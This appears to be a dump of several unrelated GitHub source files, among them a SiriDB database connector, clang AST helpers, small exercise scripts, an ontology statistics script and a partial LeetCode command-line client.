host='127.0.0.1',\n port=DEFAULT_CLIENT_PORT,\n loop=None,\n timeout=10,\n protocol=_SiriDBProtocol):\n self._loop = loop or asyncio.get_event_loop()\n client = self._loop.create_connection(\n lambda: protocol(username, password, dbname),\n host=host,\n port=port)\n self._transport, self._protocol = self._loop.run_until_complete(\n asyncio.wait_for(client, timeout=timeout))\n self._loop.run_until_complete(self._wait_for_auth())\n\n async def _wait_for_auth(self):\n try:\n res = await self._protocol.auth_future\n except Exception as exc:\n logging.debug('Authentication failed: {}'.format(exc))\n self._transport.close()\n raise exc\n else:\n self._protocol.on_authenticated()\n\n def close(self):\n if hasattr(self, '_protocol') and hasattr(self._protocol, 'transport'):\n self._protocol.transport.close()\n\n def query(self, query, time_precision=None, timeout=30):\n result = self._loop.run_until_complete(\n self._protocol.send_package(CPROTO_REQ_QUERY,\n data=(query, time_precision),\n timeout=timeout))\n return result\n\n def insert(self, data, timeout=600):\n result = self._loop.run_until_complete(\n self._protocol.send_package(CPROTO_REQ_INSERT,\n data=data,\n timeout=timeout))\n return result\n\n def _register_server(self, server, timeout=30):\n '''Register a new SiriDB Server.\n\n This method is used by the SiriDB manage tool and should not be used\n otherwise. 
Full access rights are required for this request.\n '''\n result = self._loop.run_until_complete(\n self._protocol.send_package(CPROTO_REQ_REGISTER_SERVER,\n data=server,\n timeout=timeout))\n return result\n\n def _get_file(self, fn, timeout=30):\n '''Request a SiriDB configuration file.\n\n This method is used by the SiriDB manage tool and should not be used\n otherwise. Full access rights are required for this request.\n '''\n msg = FILE_MAP.get(fn, None)\n if msg is None:\n raise FileNotFoundError('Cannot get file {!r}. Available file '\n 'requests are: {}'\n .format(fn, ', '.join(FILE_MAP.keys())))\n result = self._loop.run_until_complete(\n self._protocol.send_package(msg, timeout=timeout))\n return result\n\n\nclass SiriDBAsyncConnection():\n\n _protocol = None\n _keepalive = None\n\n async def keepalive_loop(self, interval=45):\n sleep = interval\n while True:\n await asyncio.sleep(sleep)\n if not self.connected:\n break\n sleep = \\\n max(0, interval - time.time() + self._last_resp) or interval\n if sleep == interval:\n logging.debug('Send keep-alive package...')\n try:\n await self._protocol.send_package(CPROTO_REQ_PING,\n timeout=15)\n except asyncio.CancelledError:\n break\n except Exception as e:\n logging.error(e)\n self.close()\n break\n\n async def connect(self,\n username,\n password,\n dbname,\n host='127.0.0.1',\n port=DEFAULT_CLIENT_PORT,\n loop=None,\n timeout=10,\n keepalive=False,\n protocol=_SiriDBProtocol):\n loop = loop or asyncio.get_event_loop()\n client = loop.create_connection(\n lambda: protocol(username, password, dbname),\n host=host,\n port=port)\n self._timeout = timeout\n _transport, self._protocol = \\\n await asyncio.wait_for(client, timeout=timeout)\n\n try:\n res = await self._protocol.auth_future\n except Exception as exc:\n logging.debug('Authentication failed: {}'.format(exc))\n _transport.close()\n raise exc\n else:\n self._protocol.on_authenticated()\n\n self._last_resp = time.time()\n if keepalive and (self._keepalive is None or self._keepalive.done()):\n self._keepalive = asyncio.ensure_future(self.keepalive_loop())\n\n def close(self):\n if self._keepalive is not None:\n self._keepalive.cancel()\n del self._keepalive\n if self._protocol is not None:\n self._protocol.transport.close()\n del self._protocol\n\n async def query(self, query, time_precision=None, timeout=3600):\n assert time_precision in (\n None,\n SECOND,\n MICROSECOND,\n MILLISECOND,\n NANOSECOND), 'time_precision must be either None, 0, 1, 2, 3'\n result = await self._protocol.send_package(\n CPROTO_REQ_QUERY,\n data=(query, time_precision),\n timeout=timeout)\n self._last_resp = time.time()\n return result\n\n async def insert(self, data, timeout=3600):\n result = await self._protocol.send_package(\n CPROTO_REQ_INSERT,\n data=data,\n timeout=timeout)\n self._last_resp = time.time()\n return result\n\n @property\n def connected(self):\n return self._protocol is not None and self._protocol._connected\n","repo_name":"SiriDB/siridb-connector","sub_path":"siridb/connector/lib/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":6467,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"22"} +{"seq_id":"73220652217","text":"#!/usr/bin/env python3\n\nimport clang.cindex\nfrom clang.cindex import CursorKind, TranslationUnit\nfrom collections import defaultdict \nimport pdb\nimport sys\n\ndef get_translation_unit( fname, cmd_args ):\n index = clang.cindex.Index.create()\n options = 
TranslationUnit.PARSE_DETAILED_PROCESSING_RECORD\n\n args = [\n '-x', cmd_args.language,\n '-std=' + cmd_args.standard,\n ]\n\n if cmd_args.include_path:\n for path in cmd_args.include_path.split( ',' ):\n args.append( '-I' )\n args.append( path )\n\n if cmd_args.clang_flags:\n for flag in cmd_args.clang_flags.split( ' ' ):\n args.append( flag )\n\n print( fname )\n try:\n tu = index.parse( fname, options=options, args=args )\n except Exception as e:\n print( \"\\nFailed to parse {}\".format( fname ) )\n if cmd_args.verbose:\n print( \"Clang arguments: \\n\\t{}\".format( '\\n\\t'.join( args ) ) )\n tu = None\n\n if tu is not None and tu.diagnostics:\n print( \"\\nParsing errors for {}\".format( fname ) )\n for diag in tu.diagnostics:\n print( \"\\t{}\".format( str( diag ) ) )\n if cmd_args.verbose:\n print( \"Clang arguments: {}\".format( ' '.join( args ) ) )\n\n return tu\n\n\ndef dump_ast( node, output_func, depth=0 ):\n \"\"\"\n dump the ast for easy human consumption\n \"\"\"\n indent = \" \" * depth\n output_func( \"%s%s: %s\" % ( indent, str( node.kind ), str( node.displayname ) ) )\n\n if node.kind in [CursorKind.DECL_REF_EXPR, CursorKind.VAR_DECL]:\n #pdb.set_trace()\n pass\n\n if node.kind == CursorKind.BINARY_OPERATOR:\n #pdb.set_trace()\n pass\n\n if node.displayname == 'stop_hunting(int)':\n #pdb.set_trace()\n pass\n\n for child in node.get_children():\n dump_ast( child, output_func, depth + 2 )\n\ndef get_human_name( node ):\n \"\"\"\n Given a declaration, find its fully qualified name (with class and\n namespaces and compilation unit) and make it human readable\n \"\"\"\n node = node.referenced\n\n res = \"{0} ({1},{2})\".format(\n node.displayname,\n node.location.line,\n node.location.column )\n\n node = node.semantic_parent\n while node:\n if node.kind == CursorKind.UNEXPOSED_DECL:\n res = \"(#include)\" + \"::\" + res\n else:\n res = str(node.displayname) + \"::\" + res\n\n node = node.semantic_parent\n\n return res\n\ndef get_qualifiers( node ):\n \"\"\"\n Given a declaration, return all its qualifiers\n This includes quaifiers on overridden cursors.\n \"\"\"\n res = set()\n for child in node.get_children():\n if child.kind == CursorKind.ANNOTATE_ATTR:\n if child.displayname.startswith(\"funqual::\"):\n res.add(child.displayname[9:])\n\n for overridden_cursor in node.get_overridden_cursors():\n res |= get_qualifiers( overridden_cursor )\n\n return res\n\ndef is_function_pointer( cursor ):\n return '(*)' in cursor.type.spelling\n\nif __name__ == '__main__':\n dump_ast(get_translation_unit(sys.argv[1]).cursor, print)\n","repo_name":"yabberyabber/funqual","sub_path":"ast_helpers.py","file_name":"ast_helpers.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"22"} +{"seq_id":"28867993563","text":"#Movie Ticket Cost Calculator\n\n#Initializing Variables\nticket_cost = 0\nadult_tickets = 0\nchild_tickets = 0\nsenior_tickets = 0\nwhile_counter = 0\n\n#To buy tickets\nwhile(while_counter==0):\n print(\" \")\n response = input(\"Do you want to purchase a ticket? 
(Y/N) \")\n if(response==\"Y\" or response==\"y\"):\n age = int(input(\"Enter age of customer: \"))\n if age in range(14,65):\n adult_tickets+=1\n ticket_cost+=12\n print(\"Ticket added to cart\")\n if age in range(0,14):\n child_tickets+=1\n ticket_cost+=8\n print(\"Ticket added to cart\")\n if(age>=65):\n senior_tickets+=1\n ticket_cost+=6\n print(\"Ticket added to cart\")\n else:\n while_counter = 1\n\n#To print number of tickets \nprint(\"Number of Adult Tickets: \",adult_tickets)\nprint(\"Number of Child Tickets: \",child_tickets)\nprint(\"Number of Senior Tickets: \",senior_tickets)\nprint(\"Ticket Cost: \",ticket_cost)\n\n#To calculate total price\ntax=0.13*ticket_cost\nprint(\"Tax: \",tax)\ntotal = ticket_cost+tax\nprint(\"Total: \",total)\n","repo_name":"SaurontheMighty/Inventory-Management","sub_path":"Other ICS3U files/movie_ticket.py","file_name":"movie_ticket.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"18777706722","text":"\"\"\"Create new Ubuntu Launcher.\"\"\"\nimport os\nimport jinja2\nfrom distutils.dir_util import copy_tree\nimport subprocess\nimport click\n\n\n@click.command()\n@click.argument('directory', type=click.Path(exists=True))\n@click.argument('project')\ndef create(directory, project):\n \"\"\"Create new Ubuntu Launcher.\n\n Usage: python project_laucher.py /new/launcher/path/ ProjectName\n\n Args:\n directory (TYPE): Where the launcher will be created.\n project (TYPE): The name of the project (or application).\n \"\"\"\n working_directory = os.getcwd()\n stock_directory = os.path.join(working_directory, \"stock\")\n\n # Target Directory (Launching Folder)\n launcher_dir = os.path.join(directory, \"launcher\")\n\n template_vars = {\n \"project_name\": project,\n \"terminal\": \"true\",\n \"icon200x200\": os.path.join(launcher_dir, \"200x200.png\"),\n \"launcher_script\": os.path.join(launcher_dir, \"launcher.sh\"),\n \"desktop_file_path\": launcher_dir,\n \"desktop_file\": project + \".desktop\",\n }\n\n # Creates Launching Folder\n os.makedirs(launcher_dir, exist_ok=True)\n\n # Copy Stock to Launching Folder\n copy_tree(src=stock_directory, dst=launcher_dir)\n\n # Jinja Environment\n template_loader = jinja2.FileSystemLoader(\n [os.path.join(working_directory, \"templates\")])\n jinja_env = jinja2.Environment(loader=template_loader)\n\n # Create project_launcher.desktop\n desktop_file = os.path.join(template_vars[\"desktop_file_path\"],\n template_vars[\"desktop_file\"])\n with open(desktop_file, \"w+\") as f:\n f.write(\n jinja_env.get_template(\"project_launcher.desktop.jinja\").render(\n template_vars))\n\n # Create Makefile\n make_file = os.path.join(template_vars[\"desktop_file_path\"], \"Makefile\")\n with open(make_file, \"w+\") as f:\n f.write(jinja_env.get_template(\"Makefile.jinja\").render(template_vars))\n\n # Create launcher.sh\n with open(template_vars[\"launcher_script\"], \"w+\") as f:\n f.write(\n jinja_env.get_template(\"launcher.sh.jinja\").render(template_vars))\n\n # Make launcher.sh executable\n subprocess.call(\n ['chmod 777 ' + template_vars[\"launcher_script\"]], shell=True)\n\n\nif __name__ == '__main__':\n create()\n","repo_name":"zinglax/Project-Launcher","sub_path":"project_launcher.py","file_name":"project_launcher.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"16592202851","text":"from owlready2 import *\nimport 
time\nimport json\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nif __name__ == '__main__':\n\n #parameters\n input_owl_directory = \"../Datasets/Rellis_3D_image_example/img_owl/\"\n\n \n #start of main script\n \n file_list_owl=[]\n for file in os.listdir(input_owl_directory):\n if file.endswith(\".owl\"):\n temp_file_owl=os.path.join(input_owl_directory, file)\n file_list_owl.append(temp_file_owl)\n #print(temp_file_owl)\n\n dictionary_of_materials = {}\n dictionary_of_instances = {}\n dictionary_of_instance_pixels = {}\n\n for input_owl in file_list_owl:\n #load owl ontology\n\n onto = get_ontology(input_owl)\n onto.load()\n\n\n named_individuals = list(onto.individuals())\n for individual in named_individuals:\n #print(individual.name) # Print the name of each named individual\n #use this name to get number of instances of each class\n\n if(individual.name[0]=='M'):\n temp_count=0\n\n for value in individual.get_properties():\n #print((individual.get_properties())) \n if (value.python_name=='Size'):\n for size in value[individual]:\n #print(individual.is_a[0].name, value.python_name, size) #prints number of pixels for entity\n # above print example: Sky Size 100.0\n try:\n dictionary_of_instance_pixels[individual.is_a[0].name]+=size\n except:\n dictionary_of_instance_pixels[individual.is_a[0].name]=size\n elif (value.python_name=='HasMaterial'):\n pass\n # for material in value[individual]:\n # print(individual.is_a[0].name, value.python_name, material.name)\n # # above print example: Sky HasMaterial M1\n elif (value.python_name=='Makes'):\n for temp in value[individual]:\n # print(individual.is_a[0].name, value.python_name, temp.name)\n temp_count=temp_count+1\n # above print example: Sky Makes F1\n #can use this to determine quantity of each material \n else:\n print('undefined value ',value.python_name )\n if(individual.name[0]=='M'):\n #print(individual.is_a[0].name, \"has \", temp_count, \" instances\")\n try:\n dictionary_of_materials[individual.is_a[0].name]+=temp_count\n except:\n dictionary_of_materials[individual.is_a[0].name]=temp_count\n if(individual.name[0]=='F'):\n try:\n dictionary_of_instances[individual.is_a[0].name]+=1\n except:\n dictionary_of_instances[individual.is_a[0].name]=1\n\n onto.destroy()\n\n \n #print('end of file ------')\n \n\n print('dataset has the following number of entities for each material \\n',dictionary_of_materials)\n\n print('dataset has the following number of entities for each instance \\n',dictionary_of_instances)\n\n print('dataset has the following number of pixels for each instance \\n',dictionary_of_instance_pixels)\n\n\n # To do:\n\n #need to check some of the owl:NamedIndividual \n # has multiple type and material for some\n # errors when multiples of the same property exist, i.e. multiple type or HasMaterial entries\n \n # need to think about how nesting works when displaying statistics \n\n # need to verify these results by comparison with json files\n # seems like there is double of what is expected\n\n\n input_image_json_directory = \"../Datasets/Rellis_3D_image_example/img_json/\"\n file_list_json=[]\n dictionary_of_json_entitites = {}\n print('verify with json files')\n for file in os.listdir(input_image_json_directory):\n if file.endswith(\".json\"):\n temp_file_json=os.path.join(input_image_json_directory, file)\n #print(temp_file_json)\n file_list_json.append(temp_file_json)\n\n for input_image_json in file_list_json:\n f2 = open(input_image_json)\n polygonInfo = json.load(f2)\n\n for i in polygonInfo['entities']:\n 
class_instance = i['type']\n # print(class_instance)\n try:\n dictionary_of_json_entitites[class_instance]+=1\n except:\n dictionary_of_json_entitites[class_instance]=1\n print(dictionary_of_json_entitites)\n\n\n \n","repo_name":"tamu-edu/ORATOR-ATLAS","sub_path":"Testing/instance_statistics.py","file_name":"instance_statistics.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26200099981","text":"TEST = False\n\nif TEST:\n inputfile = \"input_test.txt\"\nelse:\n inputfile = \"input.txt\"\n\nHASHLENGTH = 256\n\nLAST_INDEX = HASHLENGTH - 1\nhashlist = list(range(0, HASHLENGTH)) # must be a list: range objects do not support slice assignment\ncursor = 0\nskip = 0\n\n\ndef reverse(sublist):\n reversed_list = []\n for i in range(0, len(sublist)):\n reversed_list.append(sublist[len(sublist) - 1 - i])\n return reversed_list\n\n\ndef reverse_circular_sublist(length):\n global cursor\n global skip\n if (cursor + length) < HASHLENGTH:\n hashlist[cursor:cursor + length] = reverse(hashlist[cursor:cursor + length])\n else:\n length1 = HASHLENGTH - cursor\n length2 = length - length1\n reversed_list = reverse(hashlist[cursor:HASHLENGTH] + hashlist[0:length2])\n hashlist[cursor:HASHLENGTH] = reversed_list[0:length1]\n hashlist[0:length2] = reversed_list[length1:length]\n cursor = (cursor + length + skip) % HASHLENGTH\n skip += 1\n\n\ndef calc_dense_hash(index):\n ans = hashlist[index]\n for i in range(index + 1, index + 16):\n ans = ans ^ hashlist[i]\n return ans\n\ndef hash_knot(key):\n dense_hash = \"\"\n for i in range(64):\n for c in key:\n length = ord(c)\n reverse_circular_sublist(int(length))\n for length in (17, 31, 73, 47, 23):\n reverse_circular_sublist(int(length))\n for i in range(16):\n dense_hash += \"{0:0{1}x}\".format(calc_dense_hash(i * 16), 2)\n return dense_hash\n\nfor line in open(inputfile, 'r'):\n print(hash_knot(line.strip())) # strip the trailing newline so it is not hashed as a length\n","repo_name":"roeltrienekens/adventofcode2017","sub_path":"day10/10b.py","file_name":"10b.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28578729784","text":"from __future__ import absolute_import, print_function\n\nimport sys\nsys.path.insert(0,'..')\nimport inline_tools\n\nimport time\n\n\ndef print_compare(n):\n print('Printing %d integers:' % n)\n t1 = time.time()\n for i in range(n):\n print(i, end=' ')\n t2 = time.time()\n py = (t2-t1)\n\n # get it in cache\n inline_tools.inline('printf(\"%d\",i);',['i'])\n t1 = time.time()\n for i in range(n):\n inline_tools.inline('printf(\"%d\",i);',['i'])\n t2 = time.time()\n print(' speed in python:', py)\n print(' speed in c:',(t2 - t1))\n print(' speed up: %3.2f' % (py/(t2-t1)))\n\n\ndef cout_example(lst):\n # get it in cache\n i = lst[0]\n inline_tools.inline('std::cout << i << std::endl;',['i'])\n t1 = time.time()\n for i in lst:\n inline_tools.inline('std::cout << i << std::endl;',['i'])\n t2 = time.time()\n\nif __name__ == \"__main__\":\n n = 3000\n print_compare(n)\n print(\"calling cout with integers:\")\n cout_example([1,2,3])\n print(\"calling cout with strings:\")\n cout_example(['a','bb', 'ccc'])\n","repo_name":"ryfeus/lambda-packs","sub_path":"Skimage_numpy/source/scipy/weave/examples/print_example.py","file_name":"print_example.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":1104,"dataset":"github-code","pt":"22"} +{"seq_id":"74631696376","text":"nums = [0, 0, 1, 1, 1, 2, 2, 3, 3, 4]\n\n\"\"\"Initial 
answer\"\"\"\n# indexes_to_remove = []\n# nums_count = 0\n# for i, num in enumerate(nums):\n# if num == nums[i - 1] and i > 0:\n# indexes_to_remove.append(i)\n# nums_count += 1\n\n# removal_count = 0\n# for index in indexes_to_remove:\n# del nums[index - removal_count]\n# removal_count += 1\n\n# print(\"k:\", nums_count - removal_count)\n# print(\"nums:\", nums)\n\n\"\"\"More efficient answer\"\"\"\n\n# Doesn't even engage in computation if no length -> it can do the same if len(nums) = 1\nif not nums:\n print(0)\n\nwrite_index = 1 # Position to overwrite duplicates\n\nfor read_index in range(1, len(nums)):\n if nums[read_index] != nums[read_index - 1]:\n nums[write_index] = nums[read_index]\n write_index += 1\n\n# Truncate the remaining duplicates\ndel nums[write_index:]\n\nprint(write_index)\n","repo_name":"cucupac/leetcode","sub_path":"interview_150/problem_3.py","file_name":"problem_3.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"73434219921","text":"#! /usr/bin/env python3\n\n\"\"\"\nLeetCode at Office\n\"\"\"\n\nimport ast\nimport logging\nimport os.path\nimport sys\nimport time\nimport typing\n\nfrom collections import namedtuple\nfrom urllib.parse import urljoin\n\nimport bs4\nimport click\nimport dogpile.cache\nimport requests\nimport requests.sessions\nimport requests.cookies\n\nfrom termcolor import cprint\n\nFORMATTER = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger('lcao')\n\nUSER_DIRECTORY = os.path.expanduser('~')\nCONFIG_DIRECTORY = os.path.join(USER_DIRECTORY, '.config', 'lcao')\n\nfile_cache_region = dogpile.cache.make_region(name='lcao')\nmemory_cache_region = dogpile.cache.make_region(name='lcao.memory').configure(\n backend='dogpile.cache.memory',\n expiration_time=300\n)\n\n\nclass _Endpoints(object):\n BASE_URL = 'https://leetcode.com'\n HOST = 'leetcode.com'\n LOGIN = urljoin(BASE_URL, 'accounts/login')\n LOGOUT = urljoin(BASE_URL, 'accounts/logout')\n ALL_PROBLEMS = urljoin(BASE_URL, 'api/problems/all')\n SUBMISSIONS = urljoin(BASE_URL, 'submissions/')\n\n @staticmethod\n def problem_description(problem_slug: str) -> str:\n return urljoin(_Endpoints.BASE_URL, 'problems/{}/description/'.format(problem_slug))\n\n @staticmethod\n def run_code(problem_slug: str) -> str:\n return urljoin(_Endpoints.BASE_URL, 'problems/{}/interpret_solution/'.format(problem_slug))\n\n @staticmethod\n def submit_code(problem_slug: str) -> str:\n return urljoin(_Endpoints.BASE_URL, 'problems/{}/submit/'.format(problem_slug))\n\n @staticmethod\n def check_run_code_status(interpret_id: str) -> str:\n return urljoin(\n _Endpoints.BASE_URL,\n 'submissions/detail/{}/check'.format(interpret_id)\n )\n\n\n_UserInformation = namedtuple('_UserInformationTuple', [\n 'name', 'num_solved', 'ac_easy', 'ac_medium', 'ac_hard', 'subscribed'\n])\n\n_AllProblemsInformation = namedtuple('_ProblemInformation', [\n 'total_num', 'num_easy', 'num_medium', 'num_hard'\n])\n\n_ProblemStatisticalInformation = namedtuple('_ProblemStatisticalInformation', [\n 'total_submitted', 'total_accepts', 'frequency'\n])\n\n_ProblemListItem = namedtuple('_ProblemListItem', [\n 'index', 'title', 'slug', 'difficulty', 'statistical_info', 'paid_only', 'status'\n])\n\n_ProblemInformation = namedtuple('_ProblemInformation', [\n 'index', 'title', 'description', 'code_definition', 'sample_testcase'\n])\n\n_TestRunResultSuccess = namedtuple('_TestRunResultSuccess', [\n 
'test_case', 'expected', 'expected_time', 'actual', 'actual_time', 'code_output'\n])\n\n_TestRunResultFailure = namedtuple('_TestRunResultFailure', [\n 'error', 'test_case', 'code_output'\n])\n\n_SubmitResultAccepted = namedtuple('_SubmitResultSuccess', [\n 'time', 'stdout', 'total_test_cases'\n])\n\n_SubmitResultWrongAnswer = namedtuple('_SubmitResultWrongAnswer', [\n 'total_test_cases', 'total_correct', 'stdout', 'last_failed_test_case', 'last_expected', 'last_actual',\n 'test_results'\n])\n\n_SubmitResultFailure = namedtuple('_SubmitResultFailure', [\n 'error', 'stdout', 'last_failed_test_case'\n])\n\n_RUN_ERROR_STATUS_CODE = {\n 12: 'Memory Limit Exceeded',\n 14: 'Time Limit Exceeded',\n 15: 'Runtime Error',\n 20: 'Compile Error'\n}\n\n_DIFFICULTY_NAME_MAPPER = {\n 1: 'Easy',\n 2: 'Medium',\n 3: 'Hard'\n}\n\n_DIFFICULTY_COLOR_MAPPER = {\n 1: 'green',\n 2: 'magenta',\n 3: 'red'\n}\n\n_STATUS_NAME_MAPPER = {\n None: '-',\n 'notac': '?',\n 'ac': '*'\n}\n\n_STATUS_COLOR_MAPPER = {\n None: 'grey',\n 'notac': 'red',\n 'ac': 'green'\n}\n\n\nclass _PrintFormatter(object):\n STATUS = ' {:1s} '\n INDEX = '{:5s}'\n TITLE = '{:60s}'\n DIFFICULTY = '{:12s}'\n ACCEPTANCE_RATE = '{:12s}'\n SUBSCRIBE_REQUIRED = '{:10s}'\n\n\n_LIST_PROBLEM_FORMATTER = ''.join([\n _PrintFormatter.STATUS,\n _PrintFormatter.INDEX,\n _PrintFormatter.TITLE,\n _PrintFormatter.DIFFICULTY,\n _PrintFormatter.ACCEPTANCE_RATE,\n _PrintFormatter.SUBSCRIBE_REQUIRED\n])\n\n_LANGUAGE_EXT_MAPPER = {\n '.c': 'c',\n '.cpp': 'cpp',\n '.cs': 'csharp',\n '.go': 'golang',\n '.java': 'java',\n '.js': 'javascript',\n '.py': 'python',\n '.rb': 'ruby',\n '.scala': 'scala',\n '.sql': 'mysql'\n}\n\n\ndef _parse_raw_problem_html(html_data: str) -> _ProblemInformation:\n parser = bs4.BeautifulSoup(html_data, 'html.parser')\n\n detail_container = parser.select_one('div[class=\"container question-detail-container\"]')\n\n caption = detail_container.select_one('h3')\n index, title = caption.text.strip().split('. ')\n\n description = detail_container.select_one('div[class=\"question-description\"]').text.strip()\n\n # Code definition is hardcoded in the JavaScript part... 
How sad we have to use regexp to capture them\n # Brutal force search for the <script> element with the code definition\n code_definition = {}\n sample_test_case = ''\n\n scripts = parser.select('script')\n interested_script_element = None\n for script in scripts:\n if 'var pageData' in script.text:\n interested_script_element = script\n break\n\n if interested_script_element:\n for line in interested_script_element.text.split('\\n'):\n if 'codeDefinition' in line:\n _, definition_raw = line.split(': ', 1)\n # Remove tailing ',' as it is part of a JSON object\n definition_raw = definition_raw.strip(',')\n code_definition = {\n item['value']: item['defaultCode']\n for item in ast.literal_eval(definition_raw)\n }\n if 'sampleTestCase' in line:\n _, sample_test_case = line.split(': ', 1)\n # Remove tailing ',', as it is part of a JSON object\n sample_test_case = ast.literal_eval(sample_test_case.strip(','))\n\n return _ProblemInformation(\n index=int(index),\n title=title,\n description=description,\n code_definition=code_definition,\n sample_testcase=sample_test_case\n )\n\n\nclass LeetCode(object):\n def __init__(self) -> None:\n self._session_ = None\n\n @property\n def _session(self) -> requests.Session:\n if not self._session_:\n persisted_cookies = file_cache_region.get('cookies') or {}\n self._session_ = requests.session()\n self._session_.cookies = requests.cookies.cookiejar_from_dict(persisted_cookies)\n self._session_.cookies.clear_expired_cookies()\n return self._session_\n\n def login(self, username, password):\n \"\"\" Authenticate LeetCode via username and password, and get session\n \"\"\"\n if self.is_authenticated():\n logger.info('Already authenticated.')\n return\n\n # We need to get the csrftoken cookie\n del self._session.cookies['csrftoken']\n _ = self._session.get(_Endpoints.LOGIN)\n auth_result = self._session.post(_Endpoints.LOGIN, data={\n 'login': username,\n 'password': password,\n 'remember': 'on',\n 'csrfmiddlewaretoken': self._session.cookies.get('csrftoken')\n }, headers={\n 'referer': _Endpoints.LOGIN\n })\n\n if not auth_result.ok:\n raise RuntimeError('Login failed: HTTP {}'.format(auth_result.status_code))\n logger.info('Login as {} succeed'.format(username))\n\n # Persist the authentication information to cache\n file_cache_region.set('cookies', self._session.cookies.get_dict())\n\n def logout(self):\n \"\"\" Logout of LeetCode \"\"\"\n if not self.is_authenticated():\n logger.warning('Cannot logout, not authenticated')\n return\n\n self._session.get(_Endpoints.LOGOUT)\n file_cache_region.delete('cookies')\n\n def is_authenticated(self) -> bool:\n \"\"\" Check if we have already login \"\"\"\n # We try to open submissions log. This is only accessible when you are logged in.\n submissions = self._session.get(_Endpoints.SUBMISSIONS, allow_redirects=False)\n if 'Location' in submissions.headers:\n # Redirect to login page, not authenticated\n logger.debug('Redirect to: {}'.format(submissions.headers['Location']))\n return False\n return True\n\n # NOTE: I cannot use -> dict to specify the return type, because\n # dogpile.cache does not support this. 
See:\n # https://bitbucket.org/zzzeek/dogpile.cache/issues/96/support-python3-keyword-only-arguments-for\n def _all_problems(self):\n \"\"\" Collect all problems/user information \"\"\"\n # LeetCode API is poorly designed, everything in the same endpoint...\n all_problems_result = self._session.get(_Endpoints.ALL_PROBLEMS)\n if not all_problems_result.ok:\n raise RuntimeError('Unable to retrieve api/problems/all, HTTP {}'.format(all_problems_result.status_code))\n return all_problems_result.json()\n\n def user_information(self) -> _UserInformation:\n if not self.is_authenticated():\n raise RuntimeError('Need login first')\n all_problems = self._all_problems()\n return _UserInformation(\n name=all_problems['user_name'],\n num_solved=all_problems['num_solved'],\n ac_easy=all_problems['ac_easy'],\n ac_medium=all_problems['ac_medium'],\n ac_hard=all_problems['ac_hard'],\n subscribed=all_problems['is_paid']\n )\n\n def problems_information(self) -> _AllProblemsInformation:\n all_problems = self._all_problems()\n if 'num_total' not in all_problems:\n raise RuntimeError('Unable to retrieve problem list.')\n level_problem_count = [\n len([i for i in all_problems['stat_status_pairs'] if i['difficulty']['level'] == difficulty])\n for difficulty in (1, 2, 3)\n ]\n return _AllProblemsInformation(\n total_num=all_problems['num_total'],\n num_easy=level_problem_count[0],\n num_medium=level_problem_count[1],\n num_hard=level_problem_count[2]\n )\n\n @memory_cache_region.cache_on_arguments()\n # NOTE: See NOTE for self._all_problems\n def problems(self):\n all_problems = self._all_problems()\n if 'stat_status_pairs' not in all_problems:\n raise RuntimeError('Unable to retrieve problem list.')\n result = []\n for item in all_problems['stat_status_pairs']:\n result.append(_ProblemListItem(\n index=item['stat']['question_id'],\n title=item['stat']['question__title'],\n slug=item['stat']['question__title_slug'],\n difficulty=item['difficulty']['level'],\n statistical_info=_ProblemStatisticalInformation(\n total_submitted=item['stat']['total_submitted'],\n total_accepts=item['stat']['total_acs'],\n frequency=item['frequency']\n ),\n paid_only=item['paid_only'],\n status=item['status']\n ))\n return result\n\n def _find_problem_item(self, index: int) -> _ProblemListItem:\n problem_item = None\n for item in self.problems():\n if item.index == index:\n problem_item = item\n break\n if not problem_item:\n raise IndexError('Invalid index: {}'.format(index))\n return problem_item\n\n def problem(self, index):\n problem_item = self._find_problem_item(index)\n problem_description = self._session.get(\n _Endpoints.problem_description(problem_item.slug),\n # If the problem requires SUBSCRIBE while you are not logged in, it will let you redirect\n allow_redirects=False\n )\n if problem_description.status_code != 200:\n raise RuntimeError('Unable to get problem {}. 
{}: HTTP {}'.format(\n problem_item.index, problem_item.slug, problem_description.status_code))\n\n return _parse_raw_problem_html(problem_description.content)\n\n @memory_cache_region.cache_on_arguments()\n # NOTE: See NOTE for self._all_problems\n def _generate_submit_code_header(self, slug):\n return {\n 'Referer': _Endpoints.problem_description(slug),\n 'x-csrftoken': self._session.cookies.get('csrftoken', domain=_Endpoints.HOST),\n 'X-Requested-With': 'XMLHttpRequest'\n }\n\n def _submit_code(self, index: int, slug: str, endpoint: str, language: str, code: str, test_case: str) -> dict:\n json_data = {\n 'data_input': test_case,\n 'judge_type': 'large',\n 'lang': language,\n 'question_id': str(index),\n 'test_mode': False,\n 'typed_code': code\n }\n run_test_result = self._session.post(\n endpoint,\n json=json_data,\n headers=self._generate_submit_code_header(slug)\n )\n if run_test_result.status_code != 200:\n raise RuntimeError(\n 'Run code failed, HTTP: {} {}'.format(run_test_result.status_code, run_test_result.text))\n\n return run_test_result.json()\n\n def _collect_submit_results(self, submit_ids: typing.List[str], slug: str,\n progress_callback: typing.Callable[[typing.List[str]], None] = None) \\\n -> typing.List[dict]:\n num_ids = len(submit_ids)\n\n result_received = [False] * num_ids\n result_json = [{}] * num_ids\n\n header = self._generate_submit_code_header(slug)\n\n while not all(result_received):\n for index, _id in enumerate(submit_ids):\n if result_received[index]:\n continue\n status = self._session.get(\n _Endpoints.check_run_code_status(_id),\n headers=header\n )\n if not status.ok:\n logger.warning('Unable to GET {}: HTTP {}'.format(_Endpoints.check_run_code_status(_id),\n status.status_code))\n result_json[index] = status.json()\n if 'run_success' in result_json[index]:\n 